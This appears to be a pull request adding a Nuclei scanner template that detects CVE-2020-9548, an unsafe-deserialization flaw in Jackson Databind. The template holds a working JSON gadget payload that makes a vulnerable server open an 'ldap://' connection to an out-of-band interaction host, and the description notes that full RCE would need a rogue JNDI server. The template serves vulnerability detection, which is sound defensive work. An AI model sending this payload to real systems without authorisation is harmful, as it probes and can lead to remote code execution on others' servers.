### PR TITLE
Added CVE-2020-9548

### DIFF
--- a/http/cves/2020/CVE-2020-9548.yaml
+++ b/http/cves/2020/CVE-2020-9548.yaml
@@ -1,0 +1,46 @@
+id: CVE-2020-9548
+
+info:
+  name: Jackson Databind AnterosDBCPConfig RCE (CVE-2020-9548)
+  author: tomaquet18
+  severity: critical
+  description: |
+    FasterXML jackson-databind before 2.9.10.4 allows unsafe deserialization via the br.com.anteros.dbcp.AnterosDBCPConfig class, which can be exploited for Remote Code Execution (RCE) when `enableDefaultTyping` is enabled and a vulnerable classpath gadget is available.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9548
+    - https://github.com/fairyming/CVE-2020-9548
+    - https://www.sangfor.com/blog/cybersecurity/fasterxml-jackson-databind-remote-code-execution-vulnerability-cve-2020-9548
+  tags: cve,cve2020,jackson,jackson-databind,deserialization,anteros,oast,rce,json,java,unsafe-deserialization
+  metadata:
+    verified: false
+
+flow: http()
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      [
+        "br.com.anteros.dbcp.AnterosDBCPConfig",
+        {
+          "healthCheckRegistry": "ldap://{{interactsh-url}}"
+        }
+      ]
+
+    matchers:
+      # Use internal matcher to avoid duplicate match events caused by multiple DNS lookups (e.g. A and AAAA queries).
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+        internal: true
+
+    extractors:
+      - type: dsl
+        dsl:
+          - "BaseURL"


### PR DESCRIPTION
### Template / PR Information

- **Added CVE-2020-9548 detection template**
- This template identifies unsafe deserialization in Jackson Databind via the `AnterosDBCPConfig` class, which can lead to Remote Code Execution (RCE) when `enableDefaultTyping` is enabled.
- Detection is performed using an **Out-of-Band (OOB)** DNS-based interaction with **Interactsh**.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details

- This template is designed to safely **detect potential vulnerability** using DNS-based interaction (`ldap://{{interactsh-url}}`).
- ⚠️ **It does not attempt RCE exploitation**, because achieving full RCE would require:
  - A **rogue JNDI/LDAP server** to serve a malicious serialized payload.
- The matcher uses `internal: true` to **avoid duplicate results** (e.g., A/AAAA queries).

### References
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2020-9548)
- [Original POC](https://github.com/fairyming/CVE-2020-9548)
- [Sangfor Blog](https://www.sangfor.com/blog/cybersecurity/fasterxml-jackson-databind-remote-code-execution-vulnerability-cve-2020-9548)
- [ParanoidSoftware: DNS Trigger via Jackson](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- [Synacktiv Deserialization Tricks](https://www.synacktiv.com/publications/java-deserialization-tricks)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)